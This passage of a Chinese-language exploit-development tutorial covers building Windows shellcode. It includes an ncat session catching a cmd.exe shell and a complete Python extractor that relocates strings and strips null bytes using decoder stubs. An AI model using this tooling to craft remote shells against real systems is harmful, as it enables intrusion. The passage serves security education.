Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  C:/Users/Kiuhnm>ncat -lvp 123 Ncat: Version 6.47 ( http://nmap.org/ncat ) Ncat: Listening on :::123 Ncat: Listening on 0.0.0.0:123 Ncat: Connection from 127.0.0.1. Ncat: Connection from 127.0.0.1:4409. Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation.  All rights reserved.  C:/Users/Kiuhnm/documents/visual studio 2013/Projects/shellcode/shellcode> 

现在可以执行任意命令了。退出则输入exit。

main

得益于linker的选项

Function Order: function_order.txt 

function_order.txt中的第一行仅有一行存在[email protected]@YAHXZ字符串,函数 entryPoint将首先被定位在shellcode中。

在源码中,linker决定了函数的顺序,因此我们可在任意函数前放入entryPoint 。main函数在源码中的最后部分,因此它会在shellcode的结尾处被链接。当描述映射文件时,我们将了解到这是如何实现的。

0x02 Python脚本

介绍

现在,含有shellcode的执行体已经准备就绪,我们需要一种提取并修复shellcode的方法。这并不容易,我已经编写了Python脚本来实现:

1.提取shellcode

2.处理字符串的重定位信息

3.通过移除null字节修复shellcode

使用 PyCharm (下载地址).

该脚本只有392行,但是它有些复杂,因此我将对其进行解释: 代码如下:

# Shellcode extractor by Massimiliano Tomassoli (2015)   import sys import os import datetime import pefile   author = 'Massimiliano Tomassoli' year = datetime.date.today().year     def dword_to_bytes(value):     return [value & 0xff, (value >> 8) & 0xff, (value >> 16) & 0xff, (value >> 24) & 0xff]     def bytes_to_dword(bytes):     return (bytes[0] & 0xff) | ((bytes[1] & 0xff) << 8) | /            ((bytes[2] & 0xff) << 16) | ((bytes[3] & 0xff) << 24)     def get_cstring(data, offset):     '''     Extracts a C string (i.e. null-terminated string) from data starting from offset.     '''     pos = data.find('/0', offset)     if pos == -1:         return None     return data[offset:pos+1]     def get_shellcode_len(map_file):     '''     Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)     '''     try:         with open(map_file, 'r') as f:             lib_object = None             shellcode_len = None             for line in f:                 parts = line.split()                 if lib_object is not None:                     if parts[-1] == lib_object:                         raise Exception('_main is not the last function of %s' % lib_object)                     else:                         break                 elif (len(parts) > 2 and parts[1] == '_main'):                     # Format:                     # 0001:00000274  _main   00401274 f   shellcode.obj                     shellcode_len = int(parts[0].split(':')[1], 16)                     lib_object = parts[-1]               if shellcode_len is None:                 raise Exception('Cannot determine shellcode length')     except IOError:         print('[!] get_shellcode_len: Cannot open "%s"' % map_file)         return None     except Exception as e:         print('[!] get_shellcode_len: %s' % e.message)         return None       return shellcode_len     def get_shellcode_and_relocs(exe_file, shellcode_len):     '''     Extracts the shellcode from the .text section of the file exe_file and the string     relocations.     Returns the triple (shellcode, relocs, addr_to_strings).     '''     try:         # Extracts the shellcode.         pe = pefile.PE(exe_file)         shellcode = None         rdata = None         for s in pe.sections:             if s.Name == '.text/0/0/0':                 if s.SizeOfRawData < shellcode_len:                     raise Exception('.text section too small')                 shellcode_start = s.VirtualAddress                 shellcode_end = shellcode_start + shellcode_len                 shellcode = pe.get_data(s.VirtualAddress, shellcode_len)             elif s.Name == '.rdata/0/0':                 rdata_start = s.VirtualAddress                 rdata_end = rdata_start + s.Misc_VirtualSize                 rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)           if shellcode is None:             raise Exception('.text section not found')         if rdata is None:             raise Exception('.rdata section not found')           # Extracts the relocations for the shellcode and the referenced strings in .rdata.         relocs = []         addr_to_strings = {}         for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:             for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)                 if shellcode_start <= entry.rva < shellcode_end:                     # The relocation location is inside the shellcode.                     relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode                     string_va = pe.get_dword_at_rva(entry.rva)                     string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase                     if string_rva < rdata_start or string_rva >= rdata_end:                         raise Exception('shellcode references a section other than .rdata')                     str = get_cstring(rdata, string_rva - rdata_start)                     if str is None:                         raise Exception('Cannot extract string from .rdata')                     addr_to_strings[string_va] = str           return (shellcode, relocs, addr_to_strings)       except WindowsError:         print('[!] get_shellcode: Cannot open "%s"' % exe_file)         return None     except Exception as e:         print('[!] get_shellcode: %s' % e.message)         return None     def dword_to_string(dword):     return ''.join([chr(x) for x in dword_to_bytes(dword)])     def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):     if len(relocs) == 0:         return shellcode                # there are no relocations       # The format of the new shellcode is:     #       call    here     #   here:     #       ...     #   shellcode_start:     #       <shellcode>         (contains offsets to strX (offset are from "here" label))     #   relocs:     #       off1|off2|...       (offsets to relocations (offset are from "here" label))     #       str1|str2|...       delta = 21                                      # shellcode_start - here       # Builds the first part (up to and not including the shellcode).     x = dword_to_bytes(delta + len(shellcode))     y = dword_to_bytes(len(relocs))     code = [         0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here                                                     # here:         0x5E,                                       #   POP ESI         0x8B, 0xFE,                                 #   MOV EDI, ESI         0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here         0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)         0xFC,                                       #   CLD                                                     # again:         0xAD,                                       #   LODSD         0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI         0xE2, 0xFA                                  #   LOOP again                                                     # shellcode_start:     ]       # Builds the final part (offX and strX).     offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label     final_part = [dword_to_string(r + delta) for r in relocs]     addr_to_offset = {}     for addr in addr_to_strings.keys():         str = addr_to_strings[addr]         final_part.append(str)         addr_to_offset[addr] = offset         offset += len(str)       # Fixes the shellcode so that the pointers referenced by relocs point to the     # string in the final part.     byte_shellcode = [ord(c) for c in shellcode]     for off in relocs:         addr = bytes_to_dword(byte_shellcode[off:off+4])         byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])       return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part)     def dump_shellcode(shellcode):     '''     Prints shellcode in C format ('/x12/x23...')     '''     shellcode_len = len(shellcode)     sc_array = []     bytes_per_row = 16     for i in range(shellcode_len):         pos = i % bytes_per_row         str = ''         if pos == 0:             str += '"'         str += '//x%02x' % ord(shellcode[i])         if i == shellcode_len - 1:             str += '";/n'         elif pos == bytes_per_row - 1:             str += '"/n'         sc_array.append(str)     shellcode_str = ''.join(sc_array)     print(shellcode_str)     def get_xor_values(value):     '''     Finds x and y such that:     1) x xor y == value     2) x and y doesn't contain null bytes     Returns x and y as arrays of bytes starting from the lowest significant byte.     '''       # Finds a non-null missing bytes.     bytes = dword_to_bytes(value)     missing_byte = [b for b in range(1, 256) if b not in bytes][0]       xor1 = [b ^ missing_byte for b in bytes]     xor2 = [missing_byte] * 4     return (xor1, xor2)     def get_fixed_shellcode_single_block(shellcode):     '''     Returns a version of shellcode without null bytes or None if the     shellcode can't be fixed.     If this function fails, use get_fixed_shellcode().     '''       # Finds one non-null byte not present, if any.     bytes = set([ord(c) for c in shellcode])     missing_bytes = [b for b in range(1, 256) if b not in bytes]     if len(missing_bytes) == 0:         return None                             # shellcode can't be fixed     missing_byte = missing_bytes[0]       (xor1, xor2) = get_xor_values(len(shellcode))       code = [         0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4                                                             # here:         0xC0,                                               #   (FF)C0 = INC EAX         0x5F,                                               #   POP EDI         0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>         0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>         0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here         0x33, 0xF6,                                         #   XOR ESI, ESI         0xFC,                                               #   CLD                                                             # loop1:         0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]         0x3C, missing_byte,                                 #   CMP AL, <missing byte>         0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI         0xAA,                                               #   STOSB         0xE2, 0xF6                                          #   LOOP loop1                                                             # shellcode_begin:     ]       return ''.join([chr(x) for x in code]) + shellcode.replace('/0', chr(missing_byte))     def get_fixed_shellcode(shellcode):     '''     Returns a version of shellcode without null bytes. This version divides     the shellcode into multiple blocks and should be used only if     get_fixed_shellcode_single_block() doesn't work with this shellcode.     '''       # The format of bytes_blocks is     #   [missing_byte1, number_of_blocks1,     #    missing_byte2, number_of_blocks2, ...]     # where missing_byteX is the value used to overwrite the null bytes in the     # shellcode, while number_of_blocksX is the number of 254-byte blocks where     # to use the corresponding missing_byteX.     bytes_blocks = []     shellcode_len = len(shellcode)     i = 0     while i < shellcode_len:         num_blocks = 0         missing_bytes = list(range(1, 256))           # Tries to find as many 254-byte contiguous blocks as possible which misses at         # least one non-null value. Note that a single 254-byte block always misses at         # least one non-null value.         while True:             if i >= shellcode_len or num_blocks == 255:                 bytes_blocks += [missing_bytes[0], num_blocks]                 break             bytes = set([ord(c) for c in shellcode[i:i+254]])             new_missing_bytes = [b for b in missing_bytes if b not in bytes]             if len(new_missing_bytes) != 0:         # new block added                 missing_bytes = new_missing_bytes                 num_blocks += 1                 i += 254             else:                 bytes += [missing_bytes[0], num_blocks]                 break       if len(bytes_blocks) > 0x7f - 5:         # Can't assemble "LEA EBX, [EDI + (bytes-here)]" or "JMP skip_bytes".         return None       (xor1, xor2) = get_xor_values(len(shellcode))       code = ([         0xEB, len(bytes_blocks)] +                          #   JMP SHORT skip_bytes                                                             # bytes:         bytes_blocks + [                                    #   ...                                                             # skip_bytes:         0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4                                                             # here:         0xC0,                                               #   (FF)C0 = INC EAX         0x5F,                                               #   POP EDI         0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>         0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>         0x8D, 0x5F, -(len(bytes_blocks) + 5) & 0xFF,        #   LEA EBX, [EDI + (bytes - here)]         0x83, 0xC7, 0x30,                                   #   ADD EDI, shellcode_begin - here                                                             # loop1:         0xB0, 0xFE,                                         #   MOV AL, 0FEh         0xF6, 0x63, 0x01,                                   #   MUL AL, BYTE PTR [EBX+1]         0x0F, 0xB7, 0xD0,                                   #   MOVZX EDX, AX         0x33, 0xF6,                                         #   XOR ESI, ESI         0xFC,                                               #   CLD                                                             # loop2:         0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]         0x3A, 0x03,                                         #   CMP AL, BYTE PTR [EBX]         0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI         0xAA,                                               #   STOSB         0x49,                                               #   DEC ECX         0x74, 0x07,                                         #   JE shellcode_begin         0x4A,                                               #   DEC EDX         0x75, 0xF2,                                         #   JNE loop2         0x43,                                               #   INC EBX         0x43,                                               #   INC EBX         0xEB, 0xE3                                          #   JMP loop1                                                             # shellcode_begin:     ])       new_shellcode_pieces = []     pos = 0     for i in range(len(bytes_blocks) / 2):         missing_char = chr(bytes_blocks[i*2])         num_bytes = 254 * bytes_blocks[i*2 + 1]         new_shellcode_pieces.append(shellcode[pos:pos+num_bytes].replace('/0', missing_char))         pos += num_bytes       return ''.join([chr(x) for x in code]) + ''.join(new_shellcode_pieces)     def main():     print("Shellcode Extractor by %s (%d)/n" % (author, year))       if len(sys.argv) != 3:         print('Usage:/n' +               '  %s <exe file> <map file>/n' % os.path.basename(sys.argv[0]))         return       exe_file = sys.argv[1]     map_file = sys.argv[2]       print('Extracting shellcode length from "%s"...' % os.path.basename(map_file))     shellcode_len = get_shellcode_len(map_file)     if shellcode_len is None:         return     print('shellcode length: %d' % shellcode_len)       print('Extracting shellcode from "%s" and analyzing relocations...' % os.path.basename(exe_file))     result = get_shellcode_and_relocs(exe_file, shellcode_len)     if result is None:         return     (shellcode, relocs, addr_to_strings) = result       if len(relocs) != 0:         print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))         print('Strings:')         for s in addr_to_strings.values():             print('  ' + s[:-1])         print('')         shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)     else:         print('No relocations found')       if shellcode.find('/0') == -1:         print('Unbelievable: the shellcode does not need to be fixed!')         fixed_shellcode = shellcode     else:         # shellcode contains null bytes and needs to be fixed.         print('Fixing the shellcode...')         fixed_shellcode = get_fixed_shellcode_single_block(shellcode)         if fixed_shellcode is None:             # if shellcode wasn't fixed...             fixed_shellcode = get_fixed_shellcode(shellcode)             if fixed_shellcode is None:                 print('[!] Cannot fix the shellcode')       print('final shellcode length: %d/n' % len(fixed_shellcode))     print('char shellcode[] = ')     dump_shellcode(fixed_shellcode)     main() 

映射文件以及shellcode长度

linker中使用如下选项来生成映射文件:

  • Debugging:
    • Generate Map File: Yes (/MAP)

告诉linker生成含有EXE结构的映射文件。

* Map File Name: mapfile 

该映射文件主要用于判断shellcode长度。

这里是映射文件的相关部分:

shellcode   Timestamp is 54fa2c08 (Fri Mar 06 23:36:56 2015)   Preferred load address is 00400000   Start         Length     Name                   Class  0001:00000000 00000a9cH .text$mn                CODE  0002:00000000 00000094H .idata$5                DATA  0002:00000094 00000004H .CRT$XCA                DATA  0002:00000098 00000004H .CRT$XCAA               DATA  0002:0000009c 00000004H .CRT$XCZ                DATA  0002:000000a0 00000004H .CRT$XIA                DATA  0002:000000a4 00000004H .CRT$XIAA               DATA  0002:000000a8 00000004H .CRT$XIC                DATA  0002:000000ac 00000004H .CRT$XIY                DATA  0002:000000b0 00000004H .CRT$XIZ                DATA  0002:000000c0 000000a8H .rdata                  DATA  0002:00000168 00000084H .rdata$debug            DATA  0002:000001f0 00000004H .rdata$sxdata           DATA  0002:000001f4 00000004H .rtc$IAA                DATA  0002:000001f8 00000004H .rtc$IZZ                DATA  0002:000001fc 00000004H .rtc$TAA                DATA  0002:00000200 00000004H .rtc$TZZ                DATA  0002:00000208 0000005cH .xdata$x                DATA  0002:00000264 00000000H .edata                  DATA  0002:00000264 00000028H .idata$2                DATA  0002:0000028c 00000014H .idata$3                DATA  0002:000002a0 00000094H .idata$4                DATA  0002:00000334 0000027eH .idata$6                DATA  0003:00000000 00000020H .data                   DATA  0003:00000020 00000364H .bss                    DATA  0004:00000000 00000058H .rsrc$01                DATA  0004:00000060 00000180H .rsrc$02                DATA    Address         Publics by Value              Rva+Base       Lib:Object   0000:00000000       ___guard_fids_table        00000000     <absolute>  0000:00000000       ___guard_fids_count        00000000     <absolute>  0000:00000000       ___guard_flags             00000000     <absolute>  0000:00000001       ___safe_se_handler_count   00000001     <absolute>  0000:00000000       ___ImageBase               00400000     <linker-defined>  0001:00000000       ?entryPoint@@YAHXZ         00401000 f   shellcode.obj  0001:000001a1       ?getHash@@YAKPBD@Z         004011a1 f   shellcode.obj  0001:000001be       ?getProcAddrByHash@@YAPAXK@Z 004011be f   shellcode.obj  0001:00000266       _main                      00401266 f   shellcode.obj  0001:000004d4       _mainCRTStartup            004014d4 f   MSVCRT:crtexe.obj  0001:000004de       ?__CxxUnhandledExceptionFilter@@YGJPAU_EXCEPTION_POINTERS@@@Z 004014de f   MSVCRT:unhandld.obj  0001:0000051f       ___CxxSetUnhandledExceptionFilter 0040151f f   MSVCRT:unhandld.obj  0001:0000052e       __XcptFilter               0040152e f   MSVCRT:MSVCR120.dll <snip> 

从映射文件的开头得知,section 1.text节,它含有代码:

Start         Length     Name                   Class 0001:00000000 00000a9cH .text$mn                CODE 

第二部分表明 .text节起始于 [email protected]@YAHXZ,这是我们的entryPoint函数,最后一个函数是函数main(这里被称作_main)。因为main函数在偏移0x266上,并且entryPoint函数位于`,我们的shellcode起始于.text节的开头,并且长度为0x266`字节。

使用python实现:

def get_shellcode_len(map_file):     '''     Gets the length of the shellcode by analyzing map_file (map produced by VS 2013)     '''     try:         with open(map_file, 'r') as f:             lib_object = None             shellcode_len = None             for line in f:                 parts = line.split()                 if lib_object is not None:                     if parts[-1] == lib_object:                         raise Exception('_main is not the last function of %s' % lib_object)                     else:                         break                 elif (len(parts) > 2 and parts[1] == '_main'):                     # Format:                     # 0001:00000274  _main   00401274 f   shellcode.obj                     shellcode_len = int(parts[0].split(':')[1], 16)                     lib_object = parts[-1]               if shellcode_len is None:                 raise Exception('Cannot determine shellcode length')     except IOError:         print('[!] get_shellcode_len: Cannot open "%s"' % map_file)         return None     except Exception as e:         print('[!] get_shellcode_len: %s' % e.message)         return None       return shellcode_len 

提取 shellcode

这部分非常容易理解,我们知道shellcode的长度并且知道shellcode被定位在.text节的起始部分。代码如下:

def get_shellcode_and_relocs(exe_file, shellcode_len):     '''     Extracts the shellcode from the .text section of the file exe_file and the string     relocations.     Returns the triple (shellcode, relocs, addr_to_strings).     '''     try:         # Extracts the shellcode.         pe = pefile.PE(exe_file)         shellcode = None         rdata = None         for s in pe.sections:             if s.Name == '.text/0/0/0':                 if s.SizeOfRawData < shellcode_len:                     raise Exception('.text section too small')                 shellcode_start = s.VirtualAddress                 shellcode_end = shellcode_start + shellcode_len                 shellcode = pe.get_data(s.VirtualAddress, shellcode_len)             elif s.Name == '.rdata/0/0':                 <snip>           if shellcode is None:             raise Exception('.text section not found')         if rdata is None:             raise Exception('.rdata section not found') <snip> 

我使用了模块pefile (下载地址). 相关的部分是if语句体。

字符串和.rdata

正如之前所说的,c/c++代码可能含有字符串。例如,我们的shellcode含有如下代码:

My_CreateProcessA(NULL, "cmd.exe", NULL, NULL, TRUE, 0, NULL, NULL, &sInfo, &procInfo); 

字符串cmd.exe被定位在.rdata节中,该节是一个只读的含有数据(已被初始化)的节。该代码对字符串进行绝对地址引用。

00241152 50                   push        eax   00241153 8D 44 24 5C          lea         eax,[esp+5Ch]   00241157 C7 84 24 88 00 00 00 00 01 00 00 mov         dword ptr [esp+88h],100h   00241162 50                   push        eax   00241163 52                   push        edx   00241164 52                   push        edx   00241165 52                   push        edx   00241166 6A 01                push        1   00241168 52                   push        edx   00241169 52                   push        edx   0024116A 68 18 21 24 00       push        242118h         <------------------------ 0024116F 52                   push        edx   00241170 89 B4 24 C0 00 00 00 mov         dword ptr [esp+0C0h],esi   00241177 89 B4 24 BC 00 00 00 mov         dword ptr [esp+0BCh],esi   0024117E 89 B4 24 B8 00 00 00 mov         dword ptr [esp+0B8h],esi   00241185 FF 54 24 34          call        dword ptr [esp+34h] 

正如我们观察到的,cmd.exe的绝对地址是242118h。注意该地址是push指令的一部分并且该绝对地址被定位在了24116Bh。如果我们用某个文件编辑器检测文件cmd.exe,我们看到如下:

56A: 68 18 21 40 00           push        000402118h 

在文件中56Ah是偏移量。因为image base的偏移量为400000h,所以对应的虚拟地址是40116A。在内存中,这应该是执行体被加载的首选的(preferred)地址。执行体在指令中的绝对地址是402118h, 如果执行体在首选的基地址上被加载,即表明已正确执行。然而,如果执行体在不同的基地址上被加载,那么需要修复指令。Windows如何知道执行体含有需要被修复的地址?PE文件含有一个相对目录(Relocation Directory),在我们的案例中它指向.reloc节。该相对目录中包含所有需要被修复的位置上的RVA

可以检查该目录并寻找如下所描述的位置上的地址

1.在shellcode中含有的(即从.text:0到末尾,main函数除外), 2.含有.rdata中的数据指针。

例如,在其他地址中,Relocation Directory将包含位于指令push 402118h的后四个字节的地址40116Bh。这些字节构成了地址402118h,它指向在.rdata中的字符串cmd.exe(起始于地址402000h)。

观察函数get_shellcode_and_relocs。在第一部分我们提取.rdata节:

def get_shellcode_and_relocs(exe_file, shellcode_len):     '''     Extracts the shellcode from the .text section of the file exe_file and the string     relocations.     Returns the triple (shellcode, relocs, addr_to_strings).     '''     try:         # Extracts the shellcode.         pe = pefile.PE(exe_file)         shellcode = None         rdata = None         for s in pe.sections:             if s.Name == '.text/0/0/0':                 <snip>             elif s.Name == '.rdata/0/0':                 rdata_start = s.VirtualAddress                 rdata_end = rdata_start + s.Misc_VirtualSize                 rdata = pe.get_data(rdata_start, s.Misc_VirtualSize)           if shellcode is None:             raise Exception('.text section not found')         if rdata is None:             raise Exception('.rdata section not found') 

相关部分是elif的语句体。

接着分析重定位部分,在我们的shellcode中寻找地址并从.rdata中提取被那些地址引用的以null结尾的字符串。

正如我们已经说过的,我们只关注shellcode中的地址。这里是函数get_shellcode_and_relocs的相关部分:

# Extracts the relocations for the shellcode and the referenced strings in .rdata.         relocs = []         addr_to_strings = {}         for rel_data in pe.DIRECTORY_ENTRY_BASERELOC:             for entry in rel_data.entries[:-1]:         # the last element's rvs is the base_rva (why?)                 if shellcode_start <= entry.rva < shellcode_end:                     # The relocation location is inside the shellcode.                     relocs.append(entry.rva - shellcode_start)      # offset relative to the start of shellcode                     string_va = pe.get_dword_at_rva(entry.rva)                     string_rva = string_va - pe.OPTIONAL_HEADER.ImageBase                     if string_rva < rdata_start or string_rva >= rdata_end:                         raise Exception('shellcode references a section other than .rdata')                     str = get_cstring(rdata, string_rva - rdata_start)                     if str is None:                         raise Exception('Cannot extract string from .rdata')                     addr_to_strings[string_va] = str           return (shellcode, relocs, addr_to_strings) 

pe.DIRECTORY_ENTRY_BASERELOC是一个数据结构表,它含有一个重定位表的入口。首先检查当前重定位信息是否在shellcode中。如果是,则进行如下操作:

1.将与shellcode的起始地址有关的重定位信息的偏移追加到 relocs

2.从shellcode中提取在已经发现的偏移上的DWORD值,并在.rdata中检查该指向数据的DWORD值;

3.从.rdata中提取起始于我们在(2)中发现的以null结尾的字符串;

4.将字符串添加到addr_to_strings

注意:

i.relocs含有在shellcode中重定位信息的偏移,即在需要被修复的shellcode中的DWORD值的偏移,以便它们指向字符串;

ii.addr_to_strings相当于一个与在(2)中被发现的字符串所在地址相关联的字典。

将loader添加到shellcode

方法是将被包含在addr_to_strings中的字符串添加到我们shellcode的尾部,然后让我们的代码引用那些字符串。

不幸的是,代码->字符串的链接过程必须在运行时完成,因为我们不知道shellcode的起始地址,那么我们需要准备一个在运行时修复shellcode的“loader”。这是转化后的shellcode结构:

Exploit开发系列教程Windows基础&shellcode

OffX是指向原shellcode中重定位信息的DWORD值,它们需要被修复。loader将修复这些地址来让它们指向正确的字符串strX。 试图理解以下代码来了解实现原理:

def add_loader_to_shellcode(shellcode, relocs, addr_to_strings):     if len(relocs) == 0:         return shellcode                # there are no relocations       # The format of the new shellcode is:     #       call    here     #   here:     #       ...     #   shellcode_start:     #       <shellcode>         (contains offsets to strX (offset are from "here" label))     #   relocs:     #       off1|off2|...       (offsets to relocations (offset are from "here" label))     #       str1|str2|...       delta = 21                                      # shellcode_start - here       # Builds the first part (up to and not including the shellcode).     x = dword_to_bytes(delta + len(shellcode))     y = dword_to_bytes(len(relocs))     code = [         0xE8, 0x00, 0x00, 0x00, 0x00,               #   CALL here                                                     # here:         0x5E,                                       #   POP ESI         0x8B, 0xFE,                                 #   MOV EDI, ESI         0x81, 0xC6, x[0], x[1], x[2], x[3],         #   ADD ESI, shellcode_start + len(shellcode) - here         0xB9, y[0], y[1], y[2], y[3],               #   MOV ECX, len(relocs)         0xFC,                                       #   CLD                                                     # again:         0xAD,                                       #   LODSD         0x01, 0x3C, 0x07,                           #   ADD [EDI+EAX], EDI         0xE2, 0xFA                                  #   LOOP again                                                     # shellcode_start:     ]       # Builds the final part (offX and strX).     offset = delta + len(shellcode) + len(relocs) * 4           # offset from "here" label     final_part = [dword_to_string(r + delta) for r in relocs]     addr_to_offset = {}     for addr in addr_to_strings.keys():         str = addr_to_strings[addr]         final_part.append(str)         addr_to_offset[addr] = offset         offset += len(str)       # Fixes the shellcode so that the pointers referenced by relocs point to the     # string in the final part.     byte_shellcode = [ord(c) for c in shellcode]     for off in relocs:         addr = bytes_to_dword(byte_shellcode[off:off+4])         byte_shellcode[off:off+4] = dword_to_bytes(addr_to_offset[addr])       return ''.join([chr(b) for b in (code + byte_shellcode)]) + ''.join(final_part) 

观察loader

CALL here                   ; PUSH EIP+5; JMP here   here:     POP ESI                     ; ESI = address of "here"     MOV EDI, ESI                ; EDI = address of "here"     ADD ESI, shellcode_start + len(shellcode) - here        ; ESI = address of off1     MOV ECX, len(relocs)        ; ECX = number of locations to fix     CLD                         ; tells LODSD to go forwards   again:     LODSD                       ; EAX = offX; ESI += 4     ADD [EDI+EAX], EDI          ; fixes location within shellcode     LOOP again                  ; DEC ECX; if ECX > 0 then JMP again   shellcode_start:     <shellcode>   relocs:     off1|off2|...     str1|str2|... 

首先,使用CALL来获取here在内存中的绝对地址。loader使用该信息对原shellcode中的偏移进行修复。ESI指向off1,因此使用LODSD来逐一读取偏移。该指令

ADD [EDI+EAX], EDI 

用于修复shellcode中的地址。EAX是当前的offXoffX是与here相关的地址偏移 。这意味着EDI+EAX是那个位置上的绝对地址。DWORD值在那个地址上包含相对于here的字符串偏移。通过将EDI添加到那个DWORD值,我们将该DWORD值转换为该字符串的绝对地址。当loader已经执行完毕时,shellcode已被修复,同时也被成功执行。

总结,如果存在重定位信息,那么会调用add_loader_to_shellcode。可在main函数中观察到:

<snip>     if len(relocs) != 0:         print('Found %d reference(s) to %d string(s) in .rdata' % (len(relocs), len(addr_to_strings)))         print('Strings:')         for s in addr_to_strings.values():             print('  ' + s[:-1])         print('')         shellcode = add_loader_to_shellcode(shellcode, relocs, addr_to_strings)     else:         print('No relocations found') <snip> 

shellcode中移除null字节 (I)

编写如下两个函数来删去null字节。

1.get_fixed_shellcode_single_block 2.get_fixed_shellcode 

可以试试使用第一个函数生成更短的代码,但是这样做不一定可被执行。但是如果使用第二个函数生成更长的代码,则必定可被执行。

首先观察get_fixed_shellcode_single_block函数,该函数的定义如下:

def get_fixed_shellcode_single_block(shellcode):     '''     Returns a version of shellcode without null bytes or None if the     shellcode can't be fixed.     If this function fails, use get_fixed_shellcode().     '''       # Finds one non-null byte not present, if any.     bytes = set([ord(c) for c in shellcode])     missing_bytes = [b for b in range(1, 256) if b not in bytes]     if len(missing_bytes) == 0:         return None                             # shellcode can't be fixed     missing_byte = missing_bytes[0]       (xor1, xor2) = get_xor_values(len(shellcode))       code = [         0xE8, 0xFF, 0xFF, 0xFF, 0xFF,                       #   CALL $ + 4                                                             # here:         0xC0,                                               #   (FF)C0 = INC EAX         0x5F,                                               #   POP EDI         0xB9, xor1[0], xor1[1], xor1[2], xor1[3],           #   MOV ECX, <xor value 1 for shellcode len>         0x81, 0xF1, xor2[0], xor2[1], xor2[2], xor2[3],     #   XOR ECX, <xor value 2 for shellcode len>         0x83, 0xC7, 29,                                     #   ADD EDI, shellcode_begin - here         0x33, 0xF6,                                         #   XOR ESI, ESI         0xFC,                                               #   CLD                                                             # loop1:         0x8A, 0x07,                                         #   MOV AL, BYTE PTR [EDI]         0x3C, missing_byte,                                 #   CMP AL, <missing byte>         0x0F, 0x44, 0xC6,                                   #   CMOVE EAX, ESI         0xAA,                                               #   STOSB         0xE2, 0xF6                                          #   LOOP loop1                                                             # shellcode_begin:     ]       return ''.join([chr(x) for x in code]) + shellcode.replace('/0', chr(missing_byte)) 

逐字节地分析shellcode并了解下这是否为被忽略的值,即从不出现在shellcode中的值。我们来了解下值0x14.如果我们用该值替换在shellcode中的每个0x00,那么shellcode将不再含有null字节,但是会因为被修改了而无法执行。最后是将一些decoder添加到shellcode,在运行时时,在原shellcode被执行前将重置null字节。如下:

CALL $ + 4                                  ; PUSH "here"; JMP "here"-1 here:   (FF)C0 = INC EAX                            ; not important: just a NOP   POP EDI                                     ; EDI = "here"   MOV ECX, <xor value 1 for shellcode len>   XOR ECX, <xor value 2 for shellcode len>    ; ECX = shellcode length   ADD EDI, shellcode_begin - here             ; EDI = absolute address of original shellcode   XOR ESI, ESI                                ; ESI = 0   CLD                                         ; tells STOSB to go forwards loop1:   MOV AL, BYTE PTR [EDI]                      ; AL = current byte of the shellcode   CMP AL, <missing byte>                      ; is AL the special byte?   CMOVE EAX, ESI                              ; if AL is the special byte, then EAX = 0   STOSB                                       ; overwrite the current byte of the shellcode with AL   LOOP loop1                                  ; DEC ECX; if ECX > 0 then JMP loop1 shellcode_begin: 

这里有两个需要重点讨论的细节。首先,该代码不能含有null字节,因为我们需要另一段代码来移除他们

Exploit开发系列教程Windows基础&shellcode

正如你看到的,CALL指令不会跳转到here,因为操作码(opcode

E8 00 00 00 00               #   CALL here 

包含四个null字节. 因为CALL 指令为 5个字节, 所以CALL here指令等价于CALL $+5.除去null字节的技巧是使用指令 CALL $+4

E8 FF FF FF FF               #   CALL $+4 

那CALL跳过4个字节 并jmp到CALL本身的最后一个FF。由字节C0紧接着CALL指令,因此在CALL指令执行之后该指令INC EAX对应的操作码FF C0会被执行。注意CALL指令中已压入栈的值仍然是here标记的绝对地址

这是除去null字节的第二种技巧:

MOV ECX,XOR ECX,

我们可以只是使用:

MOV ECX,

但是这将不会生成null字节。而实际上,shellcode的长度为0x400,我们将会看到该指令

B9 00 04 00 00 MOV ECX, 400h

存在3个null字节。

为了避免存在该问题,我们选择使用一个不会出现在00000400h中的non-null字节。我们选择使用0x01.现在我们计算如下:

<xor value 1 for shellcode len> = 00000400h xor 01010101 = 01010501h <xor value 2 for shellcode len> = 01010101h 

在指令中使用<xor value 1 for shellcode len> 和 <xor value 2 for shellcode len>对应的操作码都不存在null字节,并且在执行xor操作后,生成的原始值为400h

对应的两条指令将会是:

B9 01 05 01 01        MOV ECX, 01010501h 81 F1 01 01 01 01     XOR ECX, 01010101h 

通过函数 get_xor_values来计算xor值。

正如以上提到过的,该代码很容易理解:通过逐字节检查shellcode来用特定的值(0x14,在之前的范例中)覆写null字节。

从shellcode中移除null字节(II)

如上的方法会失败,因为我们不能找到从不在shellcode中出现过的字节值。如果失败了,我们需要使用get_fixed_shellcode,但是它更为复杂。

